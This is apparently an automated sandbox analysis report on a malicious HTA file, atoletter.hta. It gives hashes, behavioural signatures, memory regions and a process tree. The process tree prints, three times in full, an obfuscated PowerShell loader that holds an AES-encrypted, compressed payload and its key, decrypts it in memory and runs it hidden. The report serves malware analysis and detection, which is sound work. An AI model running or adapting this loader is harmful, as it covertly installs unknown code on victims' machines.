Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    10-01-2024 21:28

General

  • Target

    163.5.169.28/atoletter.hta

  • Size

    1.1MB

  • MD5

    47b67f1ef2ff1967fd6eee7f2eee2a79

  • SHA1

    e53cecf356df43405a19daf75ff5dcfd8b44f2ce

  • SHA256

    6c4beabd874f9b38209eb0cc585fc19407edc997ffb0bf0897c34bf4552f5194

  • SHA512

    d9586f412e0a9cecc5909cde9391def8c338ca086ba506366076816f6a4ce8309176e884a133bc11bec731bf1d9bf3b027e42ef6a49b545b000ffee60c6d42b9

  • SSDEEP

    1536:jxr5/6p/OpbQEcQIKdquZcod/zA4l2ZFmr/l1vcmafSIm+lIWFeQnoxLPCQwkcUC:jxV6JsMEcQIQZcod/c4K

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\atoletter.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $ouWgc = 'AAAAAAAAAAAAAAAAAAAAAJJ5zJYQm1Zc3enanMEM+VL8ZXuICb6VwD675Ng9elcpqLdG6ICh9Z7Z+T51gQRQ54EMOhzaaSKbTBu4JpiwL439fdXQDT70+pvcz4RAG9WpVYj59gf8JaM5/R8GHz+RAh72y7CFTElnWpJnPOWSmBQLOZzt0/lBGIkvo8CCtfb+eoNNtY2qVZkiAiAE6K+1AcPNbpKkdt2t5p905qBeTBpO6XAM14DJwkfG7/JjNjMsMQzmCMn900E9A/D38WhuXhXNdolwgKNr82S1P6WR1jGJ1gK19IH0Yo3o6Ztbp9t1W/MpsUmKvbfRGfR+ujtzM+BljKf4x7/C/vh5ROlaoxrfVeR8YjlVRWrrqqr2fGu8nJDe0R47zcHiTPa3KDIRm6DxbDsdWwgFmSg22QwwLcekZa7ZsJmI7LY/ARBjtZI/uinhgNJH4bHID52dCZCC4HxLBKiAyMoMVl2FFGmLmSjzZDw2lfAMj8Osj0hEeHMIP2hy1bX0/15KOCW1DFmWuGICLq0Nq4Zmv/QuJQ7JJzHGeayZXoawKVf34y++mDaahJecdnyL9nEeoj6HdBD+pbzL3yfP+KDYqFFrdqq/KdDyKTTNKpPflyInMJDn8TKDxPN7ZiDFKwB4g4qIgpGv4Age35rADhVpEO20ONR7t/shCgdp6aRd/69Fs6d6oNFyqD16GjcDt5AlFS8MEbpB/gwoQVV/TXaFs7IkfK389w1VVdMbud4LbHn2nm1Ie7ocZ2DJX4q4RmJ/tbS8OK0FttxyOhIhAiHBAWZJvHlRbRfRUtPOa0jUukf9ZO1r91Q0rU/bS4F6tyTahbT2YwftbqECzalSKVlMJ4p+3OaDWYWaGKodeuIhrdOyygIGnBKJQZHupLP00vzuBei0GseoaAi9dnz5Oca+4yosxHX12VS1HYHcMU5QKbFLcavV8R3NlHLe8M0rFUdnuvw+Tln4dQUk+lyNDVIIgikZGMcaDmRGCoDwy4sjJg7O4Lcqxbp0JOKIs7nB7vGDZQvqJlASEQ==';$KpoWkt = 'cGlRTW1jb0JrYXNBRWliZEFhV29NTlFZdUZoZmRYTHM=';$gzZYTwF = New-Object 'System.Security.Cryptography.AesManaged';$gzZYTwF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gzZYTwF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gzZYTwF.BlockSize = 128;$gzZYTwF.KeySize = 256;$gzZYTwF.Key = [System.Convert]::FromBase64String($KpoWkt);$aNMav = [System.Convert]::FromBase64String($ouWgc);$NtOIkJQM = $aNMav[0..15];$gzZYTwF.IV = $NtOIkJQM;$iZrffCtxZ = $gzZYTwF.CreateDecryptor();$gUtySeDSJ = $iZrffCtxZ.TransformFinalBlock($aNMav, 16, $aNMav.Length - 16);$gzZYTwF.Dispose();$ggfKN = New-Object System.IO.MemoryStream( , $gUtySeDSJ );$PQcPw = New-Object System.IO.MemoryStream;$kxDrFXdIy = New-Object System.IO.Compression.GzipStream $ggfKN, ([IO.Compression.CompressionMode]::Decompress);$kxDrFXdIy.CopyTo( $PQcPw );$kxDrFXdIy.Close();$ggfKN.Close();[byte[]] $rFrmBzrz = $PQcPw.ToArray();$CHvPLqa = [System.Text.Encoding]::UTF8.GetString($rFrmBzrz);$CHvPLqa | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2348
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $ouWgc = 'AAAAAAAAAAAAAAAAAAAAAJJ5zJYQm1Zc3enanMEM+VL8ZXuICb6VwD675Ng9elcpqLdG6ICh9Z7Z+T51gQRQ54EMOhzaaSKbTBu4JpiwL439fdXQDT70+pvcz4RAG9WpVYj59gf8JaM5/R8GHz+RAh72y7CFTElnWpJnPOWSmBQLOZzt0/lBGIkvo8CCtfb+eoNNtY2qVZkiAiAE6K+1AcPNbpKkdt2t5p905qBeTBpO6XAM14DJwkfG7/JjNjMsMQzmCMn900E9A/D38WhuXhXNdolwgKNr82S1P6WR1jGJ1gK19IH0Yo3o6Ztbp9t1W/MpsUmKvbfRGfR+ujtzM+BljKf4x7/C/vh5ROlaoxrfVeR8YjlVRWrrqqr2fGu8nJDe0R47zcHiTPa3KDIRm6DxbDsdWwgFmSg22QwwLcekZa7ZsJmI7LY/ARBjtZI/uinhgNJH4bHID52dCZCC4HxLBKiAyMoMVl2FFGmLmSjzZDw2lfAMj8Osj0hEeHMIP2hy1bX0/15KOCW1DFmWuGICLq0Nq4Zmv/QuJQ7JJzHGeayZXoawKVf34y++mDaahJecdnyL9nEeoj6HdBD+pbzL3yfP+KDYqFFrdqq/KdDyKTTNKpPflyInMJDn8TKDxPN7ZiDFKwB4g4qIgpGv4Age35rADhVpEO20ONR7t/shCgdp6aRd/69Fs6d6oNFyqD16GjcDt5AlFS8MEbpB/gwoQVV/TXaFs7IkfK389w1VVdMbud4LbHn2nm1Ie7ocZ2DJX4q4RmJ/tbS8OK0FttxyOhIhAiHBAWZJvHlRbRfRUtPOa0jUukf9ZO1r91Q0rU/bS4F6tyTahbT2YwftbqECzalSKVlMJ4p+3OaDWYWaGKodeuIhrdOyygIGnBKJQZHupLP00vzuBei0GseoaAi9dnz5Oca+4yosxHX12VS1HYHcMU5QKbFLcavV8R3NlHLe8M0rFUdnuvw+Tln4dQUk+lyNDVIIgikZGMcaDmRGCoDwy4sjJg7O4Lcqxbp0JOKIs7nB7vGDZQvqJlASEQ==';$KpoWkt = 'cGlRTW1jb0JrYXNBRWliZEFhV29NTlFZdUZoZmRYTHM=';$gzZYTwF = New-Object 'System.Security.Cryptography.AesManaged';$gzZYTwF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gzZYTwF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gzZYTwF.BlockSize = 128;$gzZYTwF.KeySize = 256;$gzZYTwF.Key = [System.Convert]::FromBase64String($KpoWkt);$aNMav = [System.Convert]::FromBase64String($ouWgc);$NtOIkJQM = $aNMav[0..15];$gzZYTwF.IV = $NtOIkJQM;$iZrffCtxZ = $gzZYTwF.CreateDecryptor();$gUtySeDSJ = $iZrffCtxZ.TransformFinalBlock($aNMav, 16, $aNMav.Length - 16);$gzZYTwF.Dispose();$ggfKN = New-Object System.IO.MemoryStream( , $gUtySeDSJ );$PQcPw = New-Object System.IO.MemoryStream;$kxDrFXdIy = New-Object System.IO.Compression.GzipStream $ggfKN, ([IO.Compression.CompressionMode]::Decompress);$kxDrFXdIy.CopyTo( $PQcPw );$kxDrFXdIy.Close();$ggfKN.Close();[byte[]] $rFrmBzrz = $PQcPw.ToArray();$CHvPLqa = [System.Text.Encoding]::UTF8.GetString($rFrmBzrz);$CHvPLqa | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2516
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1924
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe $ouWgc = 'AAAAAAAAAAAAAAAAAAAAAJJ5zJYQm1Zc3enanMEM+VL8ZXuICb6VwD675Ng9elcpqLdG6ICh9Z7Z+T51gQRQ54EMOhzaaSKbTBu4JpiwL439fdXQDT70+pvcz4RAG9WpVYj59gf8JaM5/R8GHz+RAh72y7CFTElnWpJnPOWSmBQLOZzt0/lBGIkvo8CCtfb+eoNNtY2qVZkiAiAE6K+1AcPNbpKkdt2t5p905qBeTBpO6XAM14DJwkfG7/JjNjMsMQzmCMn900E9A/D38WhuXhXNdolwgKNr82S1P6WR1jGJ1gK19IH0Yo3o6Ztbp9t1W/MpsUmKvbfRGfR+ujtzM+BljKf4x7/C/vh5ROlaoxrfVeR8YjlVRWrrqqr2fGu8nJDe0R47zcHiTPa3KDIRm6DxbDsdWwgFmSg22QwwLcekZa7ZsJmI7LY/ARBjtZI/uinhgNJH4bHID52dCZCC4HxLBKiAyMoMVl2FFGmLmSjzZDw2lfAMj8Osj0hEeHMIP2hy1bX0/15KOCW1DFmWuGICLq0Nq4Zmv/QuJQ7JJzHGeayZXoawKVf34y++mDaahJecdnyL9nEeoj6HdBD+pbzL3yfP+KDYqFFrdqq/KdDyKTTNKpPflyInMJDn8TKDxPN7ZiDFKwB4g4qIgpGv4Age35rADhVpEO20ONR7t/shCgdp6aRd/69Fs6d6oNFyqD16GjcDt5AlFS8MEbpB/gwoQVV/TXaFs7IkfK389w1VVdMbud4LbHn2nm1Ie7ocZ2DJX4q4RmJ/tbS8OK0FttxyOhIhAiHBAWZJvHlRbRfRUtPOa0jUukf9ZO1r91Q0rU/bS4F6tyTahbT2YwftbqECzalSKVlMJ4p+3OaDWYWaGKodeuIhrdOyygIGnBKJQZHupLP00vzuBei0GseoaAi9dnz5Oca+4yosxHX12VS1HYHcMU5QKbFLcavV8R3NlHLe8M0rFUdnuvw+Tln4dQUk+lyNDVIIgikZGMcaDmRGCoDwy4sjJg7O4Lcqxbp0JOKIs7nB7vGDZQvqJlASEQ==';$KpoWkt = 'cGlRTW1jb0JrYXNBRWliZEFhV29NTlFZdUZoZmRYTHM=';$gzZYTwF = New-Object 'System.Security.Cryptography.AesManaged';$gzZYTwF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gzZYTwF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gzZYTwF.BlockSize = 128;$gzZYTwF.KeySize = 256;$gzZYTwF.Key = [System.Convert]::FromBase64String($KpoWkt);$aNMav = [System.Convert]::FromBase64String($ouWgc);$NtOIkJQM = $aNMav[0..15];$gzZYTwF.IV = $NtOIkJQM;$iZrffCtxZ = $gzZYTwF.CreateDecryptor();$gUtySeDSJ = $iZrffCtxZ.TransformFinalBlock($aNMav, 16, $aNMav.Length - 16);$gzZYTwF.Dispose();$ggfKN = New-Object System.IO.MemoryStream( , $gUtySeDSJ );$PQcPw = New-Object System.IO.MemoryStream;$kxDrFXdIy = New-Object System.IO.Compression.GzipStream $ggfKN, ([IO.Compression.CompressionMode]::Decompress);$kxDrFXdIy.CopyTo( $PQcPw );$kxDrFXdIy.Close();$ggfKN.Close();[byte[]] $rFrmBzrz = $PQcPw.ToArray();$CHvPLqa = [System.Text.Encoding]::UTF8.GetString($rFrmBzrz);$CHvPLqa
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2364

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    fd3435b9110ecd4de241c15e1e055ecc

    SHA1

    e4c22ff752f4b442541b6b79c130805bf53b52d7

    SHA256

    492a4d99e9af389f1f2642e12aaeb4cf68389f06461eab8c57ff9adc6a12155c

    SHA512

    3f42876a21b8d3c64db0e9462e7d7e7e87ec25441c3b549e914ab7fdb79a5a93a6db5c082238ef860be7a902f9a7dab3fd54b7c983648752fafe2503f5887f53

  • memory/1924-33-0x0000000002E60000-0x0000000002EA0000-memory.dmp

    Filesize

    256KB

  • memory/1924-36-0x00000000728F0000-0x0000000072E9B000-memory.dmp

    Filesize

    5.7MB

  • memory/1924-28-0x00000000728F0000-0x0000000072E9B000-memory.dmp

    Filesize

    5.7MB

  • memory/1924-31-0x0000000002E60000-0x0000000002EA0000-memory.dmp

    Filesize

    256KB

  • memory/1924-34-0x00000000728F0000-0x0000000072E9B000-memory.dmp

    Filesize

    5.7MB

  • memory/2348-6-0x0000000072E20000-0x00000000733CB000-memory.dmp

    Filesize

    5.7MB

  • memory/2348-3-0x0000000002980000-0x00000000029C0000-memory.dmp

    Filesize

    256KB

  • memory/2348-2-0x0000000072E20000-0x00000000733CB000-memory.dmp

    Filesize

    5.7MB

  • memory/2348-4-0x0000000072E20000-0x00000000733CB000-memory.dmp

    Filesize

    5.7MB

  • memory/2348-5-0x0000000002980000-0x00000000029C0000-memory.dmp

    Filesize

    256KB

  • memory/2364-22-0x0000000002DE0000-0x0000000002E20000-memory.dmp

    Filesize

    256KB

  • memory/2364-25-0x00000000728F0000-0x0000000072E9B000-memory.dmp

    Filesize

    5.7MB

  • memory/2364-18-0x00000000728F0000-0x0000000072E9B000-memory.dmp

    Filesize

    5.7MB

  • memory/2364-32-0x0000000002DE0000-0x0000000002E20000-memory.dmp

    Filesize

    256KB

  • memory/2364-30-0x0000000002DE0000-0x0000000002E20000-memory.dmp

    Filesize

    256KB

  • memory/2364-35-0x00000000728F0000-0x0000000072E9B000-memory.dmp

    Filesize

    5.7MB